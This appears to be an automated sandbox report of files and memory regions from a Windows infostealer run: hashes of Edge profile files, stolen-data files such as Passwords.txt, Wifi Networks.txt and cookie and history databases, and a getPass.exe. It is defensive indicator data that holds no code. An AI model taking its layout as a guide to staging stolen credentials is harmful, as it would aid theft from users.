C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 41706d2b2a16b6d290f46679e6b7b771
SHA1 33dd64efcfa78ff597b08be7196cb4043f6ea3c4
SHA256 78775317aff1245112a3a83bf74c3309ad0ad35e0e748c9073e4b294bdc70817
SHA512 6d3fe340eae01c6003826be2baa5a18c8d9bb5ee1ee98d4d53965a8a600eb6cbd61911382e04e6eb1f784905c9e7c72fd6e9e7d9cec0c51e25f6e239d8617171

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5eb306884214ba64013c76328bb9f9d4
SHA1 8ae9deb1eed606480272141ec89e9685c8f42a93
SHA256 48685e871e5bbb448c6b893a8de2989f43a2729a56e1a7f343fdc778d54c7cdf
SHA512 158882d48d93c90bda31562a682f1f9fcebee34e5f3b733749d8374d367e77cf5111870295b38732f2e6dc0a367d9bacf190e7a1562a7f8dba4edc3eba627065

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/60-715-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 72542e6d6762532ae6dfb8e4a16d84bc
SHA1 1e78d4bf7e026e801f6f6a196a093854ff39141e
SHA256 d30ad474e6663f4a1808834a21db9b7ad8341a4650fb4a4e469cb2283eeea68c
SHA512 79714f71c146b5c25b40f2dd3ad323bcea239d0dcd07a5d070b3c72db156d18ef5cf4dad9035ff93848b697f562639aadc2ab6ddc18a73e55ed0ccf45e552681

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e5f73567509714128ad2e4c9bd06f6f5
SHA1 8db3aa6571db9fa3a6c484ca668df4f3338965fc
SHA256 55613b89c1c9734c33e19ce021a277573a6f95716c49e83e6254ec3c801b423f
SHA512 8a49adb4306bd1a6189f2b528880b97888ff1f9488ea915a6f0c78c74e5dc9c1458c86529ef21e9a3b91aa30172829ec511f74c6c1de539d7f9bb0c552f4f75f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe598032.TMP

MD5 c2bcb6bad8febfb4dd6460c6ddf3a152
SHA1 6a96ec3a6c6f047fa0e387fc72ef2c39ee2a6936
SHA256 8060187ecb9510af3f417c5dcbb6e3caa896c3c54fb8c586066b39b71eed124f
SHA512 cebd788d42b305a1ba6fe1cd66078078a40df2bd1450e37eb5ab20100a190fd30250da7edf00589d2ada2a609df9e2d34c75602fdec86ac37391b785a7bf0816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 72fed3b3d447ba8bda2726db18f24d5b
SHA1 311fd6f1b00736b2b68fcb124ec6676e9b2f93c1
SHA256 3988a6d85e1a4baa4f86fbf0a7bfbbf4c3b07e810610abe120c4869bb0357401
SHA512 cfe1afbb9fe93b8cb4c0d3a28cfecfe7e2290a5d5a49bb429fe393da6046c2e5a2b726c4df11d1b088071132cea291cf7df115db19ca7466c38de58c23481b27

memory/60-1144-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f77aca7f8bccd5c5369b7d95184363a2
SHA1 4a220187c6bc25e8fe56edcb923e82238083466a
SHA256 6be586cd7a9e4ed49096d2482d379606c243ee5f30e9ecb393de535bd0b880f3
SHA512 b4511d7b04b112632536bf7339b6ec979152151264bb6e1ac05fc6f3c9c81ca7efca2ea6d0e6da4fc27ea7ddeca6080a95a604cb43353304435c0f542d4b9faf

C:\Users\Admin\Downloads\Unconfirmed 329195.crdownload

MD5 1ddc7adb668ac48d1d461d933b9c8491
SHA1 a9861fe2cfec52b2c2527c0b6c949b2ac62cd1df
SHA256 0fce1d43800b811df4fdba2c480570a004556f24f564cf4a2b0fe9d51d9da8b5
SHA512 22ead27c8b345bd5db131bad9f0719a32ebff74fb55af171900a04e2e453a7f4f77be663a219e56ce699c67243328e5772af0d9bfbdc1d4de6d375d50f3ce38c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9e2bca5f35ae6a906143131b3284e97f
SHA1 68b06c530c955eb1a7c5898e7d3f8990cd6b01f9
SHA256 6d30c7143e6f435e8ae03c2f47303d761bb7cbff74528d6a3dc6d53e420d79ca
SHA512 e91fa94642a9950227ff30db4f6525146124b6936588ccbb60f6cb197a31f4a01ef3518b92910cbc9e02b04ccd5477cb0c795e4f6e92a0910feec2ea542bc11e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c582d229375dd238a312893b07000da5
SHA1 27da8e0b486fa65a5325bc85d2b8cc1f855e6954
SHA256 7b7ce6a95d435078455b9fb406430c270b93a2357c1e0b2eb442bab1b3bf15db
SHA512 cf71d14e0cf09aef5f22727ec3755cb93b71334a4e0a3d59ab6172a70d3845093d634a33a7ffa83156059641092b6d6b949d0f4d8d1488d50bd63997c0e98b47

memory/2612-1188-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2612-1198-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\dab77623-2dc5-4eea-bb1c-aa35f1d1d26a.tmp

MD5 aa2f4f411a772c63b1a30dcfdc62e4d8
SHA1 d8a4097faf688f64597f3d76597c5e20703aa7d2
SHA256 cfc8a3796345cd9e0895e1df91f4ffe9eebfd142568b853a52fd4e84de20e220
SHA512 0e4283f522d23f5f2dc6b0917f2bdc3b066424983dae2678a871d6a88fb65ae2123ed52fb46c7aad7dae941e83a78953644a311314b12c457e2c43ad0cd8a692

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b59b2bf7610ca9ac075d679c586e2961
SHA1 4c9ec9451dc9e51bd96e73757be1fd163276aaf4
SHA256 e9dda9d2382ce7ec9e5ac0002ddc6f9d51dc16867f66d231c3b7aad40d564a6d
SHA512 f0ebb58fbb11d1d18e1497405c7b61849107e80c8ecb2baa51e3d26c24b7a9a884250f73e0e765d33ad06308f623b29708b98460b3c7a73ba29d6d47a5759275

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4141642404b71d1732f4049e94bbb01b
SHA1 5a39bafebd0cc2ddf945ce89cae74d6192644986
SHA256 7fe572b5aa5afd3bef7b7a683a65c438eb256eede229930987e73d26fc00dcca
SHA512 f44ccdb8343570416a039265c4fc59bfaca29cbaa5b4bed85fc07dd0bbbc866a9f2f07f790dde5e6cfb7d1a3db608947b198ba33522ba6e76d9b0b95ffffbb51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 663026bd976e0e2836cee4d32bfc8b7e
SHA1 b86d0595c42a1fc0f7fbcba4bfe5ffc9dad44038
SHA256 b4f86202265ffc484b496da5dfcf5c51470db9581b65bfba61b16d8fe21fc05a
SHA512 e92fae5c357af911ffe01048612753b60e1a0082c2afe024e7f25b746818416a6573765691a3f38251813ee19a8b5535147af71886e81a03b792ab813c7d4513

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6d761b7cd38acfc6e3a42c74f828ee9c
SHA1 5f552446ba3b0a3a60a49f1c68e16f57354a5895
SHA256 8a63a8b9c4d7ca7f9bee23d792166dfc1a8355e63dc086808b127843211e6cec
SHA512 e66f6a57b6c7f62985cd01d01f7351d767c9f560689c205a28ab52900faf1a5c405a1b5744e64d4001961f806414d89e4f07c674b9c6a5c4ecbfd332aaed991e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9f28afca79c86820f4e042e3c0b1e928
SHA1 c6aac1c5760670da30c8d37a38877cf9118592f1
SHA256 f877eb419cc9c3ff6a95220bc37bf42c9feeb46e1a3bc7b848950b98dc347883
SHA512 6c52cdb529a0e1c815569c4c3529fab368d5e5649bf18697fdb9e899fa4936bcdc2ad7d0b4d6f71b22c004aadd3190c1e822f7f58bf4aa4360f60a783fa21220

memory/3896-1285-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3896-1288-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload

MD5 3ff918605edb3c47b8cfc682ce6f84dc
SHA1 a28f623c63c40a7273140c630d637af457966503
SHA256 53665fcb003261702188950b5b7a542ef3361b2861a1a8420d7171a78170a2ca
SHA512 43d88c3ca0202e702877981b077503a22c4008460405bf995c82cf8a150d909ddf511603aaca6de370daf021280ec66515b93f4b5d7da42ead3f862f81a8098d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a64c0453203500b85aaf95d1cb441445
SHA1 02670f8a787f9ab79d804f91be14c56a60d82850
SHA256 316dad135ba4612118cbe2e5dbdf0bb96def7c71aeaacf143e4747a6b177a6f4
SHA512 e936d13431f17093a001bb9f40e1e3d4a5e270711f80e81085dbc0f7d725d6813414bc46832f7cd8fd4d6d9eb3caefb3b5b7a77118f43c918f1adb78f90511a8

memory/5068-1386-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1387-0x00007FF987870000-0x00007FF98789D000-memory.dmp

memory/5068-1388-0x00007FF987780000-0x00007FF987799000-memory.dmp

memory/5068-1389-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/5068-1391-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1390-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5068-1392-0x000001B5AA050000-0x000001B5AA3C5000-memory.dmp

memory/5068-1394-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1393-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1395-0x00007FF983DE0000-0x00007FF983DF4000-memory.dmp

memory/5068-1396-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

memory/5068-1397-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1399-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1398-0x00007FF983CA0000-0x00007FF983CC3000-memory.dmp

memory/5068-1400-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1402-0x00007FF9838F0000-0x00007FF98391F000-memory.dmp

memory/5068-1401-0x00007FF983AD0000-0x00007FF983AFB000-memory.dmp

memory/3752-1408-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3752-1410-0x000002D9D6E10000-0x000002D9D6E20000-memory.dmp

memory/3752-1414-0x000002D9D6E10000-0x000002D9D6E20000-memory.dmp

memory/5068-1415-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/372-1425-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/372-1426-0x000002702FE70000-0x000002702FE80000-memory.dmp

memory/1856-1437-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/372-1438-0x000002702FE70000-0x000002702FE80000-memory.dmp

memory/3752-1440-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1856-1439-0x000002C7599E0000-0x000002C7599F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI42562\cookiesData.db

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\_MEI42562\historyData.db

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Temp\chp9123.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/5836-1569-0x0000000000400000-0x0000000000484000-memory.dmp

memory/5068-1612-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1617-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1619-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1618-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1624-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1623-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1629-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1630-0x00007FF987870000-0x00007FF98789D000-memory.dmp

memory/5068-1631-0x00007FF987780000-0x00007FF987799000-memory.dmp

memory/5068-1632-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/5068-1633-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5068-1635-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1636-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1634-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1637-0x00007FF983DE0000-0x00007FF983DF4000-memory.dmp

memory/5068-1640-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1642-0x00007FF983AD0000-0x00007FF983AFB000-memory.dmp

memory/5068-1643-0x00007FF9838F0000-0x00007FF98391F000-memory.dmp

memory/5068-1644-0x00007FF96F210000-0x00007FF96F32C000-memory.dmp

memory/5068-1641-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1645-0x00007FF983490000-0x00007FF9834D3000-memory.dmp

memory/5068-1639-0x00007FF983CA0000-0x00007FF983CC3000-memory.dmp

memory/5068-1638-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ‌\System\Wifi Networks.txt

MD5 5002192a3d6b89de74e57fbd25736e95
SHA1 cb539f8b93afae00aa5caa93b0215122a04f5db6
SHA256 d872470bec54c3c9fe1b7f1df2f6ce91cce78eae48e211fb418c6b3f7e26fde2
SHA512 ec4e290ecf205a3ea83206806ebb02595299dd984c59d1fa86652401c09e2e95ac675fc1dd5e420acfcdf4a52d6aae26150728b3061196ef7080f6bf39cc075b

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Videos.txt

MD5 ac7a758dadda57c6ae8da26875554b7d
SHA1 c06253bc1b6783a7f9787a68ab83bdbf85bfe105
SHA256 a7841616bebe3493a10336ec93226428b62e177cf19ba77036a28ed84b6d4bc6
SHA512 cbc48f5097f5aa5c4ad08c71e5c09abe01d98994f41e2f417773becc926c90376ca141c8a15702d7a083006d5e0ddf17f0df475bd5b7ec490d56c3f5606bf013

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Pictures.txt

MD5 b05e0edef4b889eb598b3397982c7a90
SHA1 5c9cd500afd71ef3bc696bcc9207d79dd19818c5
SHA256 a406c0965a97aec31e6a14b743b20b11465cca026d28a3ce04aef6203d70d7cd
SHA512 27d402f85feed54946186a60bf56108d791e8b40339f916e8fc090c63c9871fdb1cd9229fc9480e2dba34fdd8a4bc2f045b3e752c6697c47503c6ec0286b43b5

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Music.txt

MD5 5144f3ee1a7a89bb059db088fc9c1e58
SHA1 9af4a4d6e09044e125b3ef3de028cf6ac2cc274c
SHA256 506d442d15e5d5b8f933af65d26fe426ef7d871ddeac920d348cababc262d9cb
SHA512 8e07459ffa2e3f24d5e6b4c6b6c0063afcd969e14bb2682bdcdff7ae311bedacfde937040149c7a1583f04bbb2a5169b6d8c24de2066fdddd06c90238e00909e

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Downloads.txt

MD5 30f083e6c1743f3a26e0db53fb7e79db
SHA1 c38acaef84c23a31ec6a9d038bf51009fa5bfd5f
SHA256 3604ec2d888e6ccb0692d213489f542b94a68ffe4b836a7a7f429faba18dc0f0
SHA512 d88271cfdfd901486b080e66ecd576d3c37e1444f4c0d6a8727144d7ec94bb0b3b97d22a83b3feebaa2eb0d2ce5ff8ece1ba949b6b6b3ca5cc43364ca0c92d2c

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Documents.txt

MD5 7a6214e23ecf21734487593f73774ac5
SHA1 4349bd0ef6c7c30230a741b0fdd7b42a06b3132a
SHA256 f6eae2809f0a3bace078ae8ab686781e6f4792f59f4d031fd3c8133c9c384305
SHA512 4899fbc423d7dbafadf005b8b57f45de70c169632e3102fb25c0baf0a0af6e8d8b55e90c1dce9e0feae173689cb84ff94d68dc3fa420d6de886f54ee56f58713

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Desktop.txt

MD5 879de7cc276687db8a4cf1841557eabc
SHA1 471f488c928a064d6979a09c3ae97f41e01e2bd9
SHA256 cf0c11a68d3ef7303de9e7c3d4260f73a6bd506f3ffc2fdf54f8f5a3356a4583
SHA512 63cd28eca4ea9bd3e0a0e819e60a07f101959eb7c3615f8d4ca96f4d48203f7032b32018322e8ccfefdbace6fa971c54bcfcfbda21a3a4e6592fb4dba45e456d

memory/1600-1841-0x0000000000400000-0x0000000000484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ‌\Credentials\Passwords.txt

MD5 5b942c6c172258e5df1bb702268e1ba0
SHA1 7db6a3e7c8c7249108b91f2a0015ac7a7e937c83
SHA256 723ae3d596c4705f8eb8045481e62a66e12dac5a7ac4374b962123619b9fd9af
SHA512 3d85ef7c0660e0dbbe48f65e1eecd6737479a2357dbd768a235a2708788b5a809aa822089f6396b7414fadb8b2744e50d0203b0bf6cdd5f03426d80fe7feecef

C:\Users\Admin\AppData\Local\Temp\    ‌\System\System Info.txt

MD5 0a22dbb3ab8d753f88545181eed210d1
SHA1 e5c92437cad8251956adbd30647fa6b8d10ecf55
SHA256 cb02bdc0ea798af0d2ff2b19431cc85737e940a1328e3f849880a589db4c00ed
SHA512 1e099125673155531632ea272742b585118286f955de84577bbbab523394d0c5cd09580e2f6db2a3835567ff3d0abb365288dce4e89135a2cab9078dd0d54f69

memory/5616-1896-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5616-1901-0x00007FF9834B0000-0x00007FF9834DE000-memory.dmp

memory/5616-1902-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5616-1903-0x00007FF974D10000-0x00007FF974DC8000-memory.dmp

memory/5616-1907-0x00007FF96E1B0000-0x00007FF96E31F000-memory.dmp

memory/5616-1908-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5616-1911-0x00007FF96F210000-0x00007FF96F32C000-memory.dmp

memory/5616-1913-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5616-1914-0x00007FF983AD0000-0x00007FF983AFD000-memory.dmp

memory/5616-1915-0x00007FF983CE0000-0x00007FF983CF9000-memory.dmp

memory/5616-1916-0x00007FF983900000-0x00007FF983919000-memory.dmp

memory/5616-1918-0x00007FF9834B0000-0x00007FF9834DE000-memory.dmp

memory/5616-1919-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5616-1917-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5616-1920-0x00007FF974D10000-0x00007FF974DC8000-memory.dmp

memory/5616-1921-0x00007FF983490000-0x00007FF9834A4000-memory.dmp

memory/5616-1922-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

memory/5616-1923-0x00007FF983210000-0x00007FF983233000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 abd37fffd21f2aaa6c5c8b255d195e57
SHA1 406ddacfcf7dbcc26f21c0c2743f20500c4d201a
SHA256 49494adf4ff74c4d5752f26a323a124805815597d948279903dffc92b24bc718
SHA512 4ac9e3b3f5fd8333dc354887cf3711b7e736500363b994c0e21128827dda886464d9537c79bc681acea44a8d660579f0f948c8cda94a915f22d0824b280da05a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6defa152c7ec8651221610d78aae59b6
SHA1 9d76ade7c5326d61b9ed290cdb7af22ba3707271
SHA256 8dd7a7a8d1b1aaa7d2b5a83b335598519744154ee1e8b319302633531f02b315
SHA512 d6352513c71407b259bf41569036c69c4a3fc300eb33728b16f1d4994a2aa43bc86cfcd86389f8213213f3c69572d8f5f003e0fcf49d9d5c460a24292a456e8a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8e8b05c6c357c7e60d276fcc74fa896e
SHA1 f88eb6a7f4d1428bccb2a8496e596f30b407134d
SHA256 b2ac9f202fc094fdb4633646ee77f7f2a3e1be1d65356f9ef4902cc370fdca25
SHA512 f7f2cf5dc19949b8eda892a42947ba3fb6e2a65ef4059ffe728f599e8d0a6e19df7ffca55f2846db3cc99ac5953bf4503f4c25edc904b17f09ee9651bbd88b23

C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe

MD5 459c755800f6394bfced303c0f9002d0
SHA1 710ab70b5498c0b2094997cb63898475af859388
SHA256 2155b81fb8e4fb169bbdce891d542edd5be8cf14748a6e6e7d03edb28d5efc42
SHA512 b4258b05709d4163210f28fc1bbc4935e9b681c65c48f3255842cf46f07fa34889f50593f8497113ec97e47271da1d6b13048fe70435219b3f7f48910225a2b4

C:\Users\Admin\AppData\Local\Temp\bhv8FBF.tmp

MD5 402b056e71a82f6cfed3b2624f3ad8e6
SHA1 f27df71042785e51506aba7b985cf3bed137ee13
SHA256 1b286eb6bc82d2c8936d28b40c5865d3755a910658fd3d8a9dc113aadf385539
SHA512 dee77c32ef48d3f99c1e72510db3db801c467655b5614d58f2e60db286f3c4546dde076cc1a33ea9ff407c0248a23f41d28cebcd0752d360360178ebc08d1cf6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 03ac0fde74553a8a62c0200a7b158586
SHA1 9a8826b24f6b67aa5c1b334a94960c61dc1be114
SHA256 b7dfd3b43c270c2fca1b9197066240e786278684b6894508e5ca12dc9dec4c3a
SHA512 5f99538a32bfc71a6ed6e07eb28e57c550b31eb9d9c9c7c0589a8f7ffb33dff8b61a2b2c0a8814a2484f56d6e0f92c4a8c2642ad97671e59320a33bfd2546aba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f1f7ff0beea982152c6c5ec1cfda4e7c
SHA1 2c39bca19cb5db6a214360c218c8fcf0bd596dba
SHA256 f8b5db994859c4bd0c0fa249f413b1f4b32062f9ba8ceb73ff1495fc99fbf7bb
SHA512 b27517e14f24a532216dbbcbcbf0505696e8ee29ae9feb3b3b77a13f73eef50046fd0afc87afb1dc062ed9da336dfbd9aad3475e9905b829606d132e577b7707

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 74d34b064a2a6dfd56f7d999e08fa854
SHA1 a1d921de04e69aae50b27fc78cd086f1548a2ead
SHA256 0427ed4fe4b40c5c05ad0067ff480738045ed4a26ba55491df1ebb4b3071f320
SHA512 95e2998bb796b8dcbbc8f92dfa4fb3065df648f8a260a29ae98ed5a7b70436de36071ac0d3f10a85638dce949d9c431438be654567fbb67dd1a34562d8b7bade

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c9de117127f11e579d0f84ef4d232042
SHA1 19cd221ae88ae8fe57b761049f459cbc77e02faa
SHA256 d0fc86f3cd114e7a001dd94c505edfe17e0c9041527401cba0bf4008e494747f
SHA512 9e0e623ad9a058a151e13ddb765b1d912ebec1e4d991eccc5dda99cb59e14cb5b7581509b569c9aa88b670a0076a90e33fe44cd334187fd0aca2d529be78c34e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62d3e5c3f2c46af9e9809766be4fce99
SHA1 55a1d8c2c3897458a1a3ec733696eaed590fb22d
SHA256 ba43f78770f92d1255c2b8aad7cb43cc03ec1fe2e24aa0744a82485e021554ce
SHA512 f01a86f4e3d3320ee67904d88309a8ec6570970479901d5d650894fd434506eb744c213c9ffc625061eac7559ca57522bc18d314e42fc58bff6efe763563e370

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 522971d4eefb6046b35f5dfe12c3f9bf
SHA1 ce508a35ce2b953b2d9e2d133ded2d4ffc77c8ee
SHA256 246b59cda54f6a06c63adb9452dc8a043f6a8d65b98fcb5dfb55dd8784aedea0
SHA512 15d5a11ab4a7c0f2882d72422d4725ed1f5890843c10539930ff0d00cf18411ab1f244c5206e8dd614033e23f1b4693a5bfa9b92ef43f5e99a0341937d6ea6b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 be8342356f389da579eb8aeb8f1e0221
SHA1 4265783a50f9798d8858e6522e9d43f3fadd7601
SHA256 0e46b5a70ae33046f0ed712a73a35f686b888eeda1b0e86349f88d7db02ed884
SHA512 bbfee8e0d7cc3f83f449ef037c428ededfe2915223601621541849aca71c7df0dd0f4d9a4d265f47d3983d4896cf09937f80867ddd38f58c22108e364f5e3505

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e93643575209445fdfcf67c7891de10e
SHA1 b81100dd8aeb9c062fdb34d51df21d585457b84a
SHA256 6eb970c2cc74c093069606971139804efaa577fb1ec5e13558e1e057c8ee2331
SHA512 e2986c17e1e3e96ae72c8aaf2e453082749fb3ea93e0e45d30a1d567c49b111f4db4301d96e1912fe1470aec34a410c37f70febfe8e2652d8e8e246950ba19fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 cdc2e1142f7a45ca0092cf691e7ae552
SHA1 4bcead2b4a1ea733baed5dda5209323650ca7b10
SHA256 2d0fb1368a9bdbf309d7097a857ab2cd204fbdfe344df8eb4dbc2e9b8c4e8005
SHA512 25e8b6dd54e04d669f65407d779c5f96d5d191479162fa8b6774c4bbb96e38caff9b635a962de91cfbd03cdd3377dc2e9a150489176e8dcbe6bb60886ea9d719

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 707144fcdcbf1f66a028204e1242a55b
SHA1 4c68239734b3f63945ba8849b750723351393cd0
SHA256 e468830d52be1e92862560c93da058666e1b3a3f695a4d722158ad7e93005a67
SHA512 ae6f7ff7327a7dc6ccbc11d8dc35f51a11d5f4e391c4b1489aba749c382f64e39bdc22e157271f2890b23b9b552520033e4852a96b9174bb4ba23c9400d4ed34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 71db317f162daf1a7306ac00ca6120f4
SHA1 7480782b3986854f413897e4db5dfcbb4fbd4322
SHA256 a7ae6a520b90ea76aaafedd7184a240237129d1395d68cd82a69a1eff0b3303c
SHA512 b925cace0926a89a077576db21e47e445845e633474c6d1b9f8be607b787eccc53a340eeb94db1101391cf41d89e6bd15766b5778ee4d4820a316a2b3bc88b37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c86d1de891d3adffdaa381bc8e903740
SHA1 4f1fbb373e70f913b871eb0cf53137b4aa3383a1
SHA256 74e5f552626345c62c599bdb5f09c9414deb068311018f17f0a7f478d585f89e
SHA512 57b3990c6345837452040d83680870acae4bc90fed615283519b917d608c1ed1d8187a773b990314aa561b3651280383eb6be2feace06a851832543ff0ec97d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e6e95077d3d0f7099008592013a19f78
SHA1 f13e3cab5138dfdad4786b9a6f338390841a3f94
SHA256 5bb4911ec2b9dcc94a6177cc254bc72edfff6f5a000a9e91d14b5e5fc87d82dc
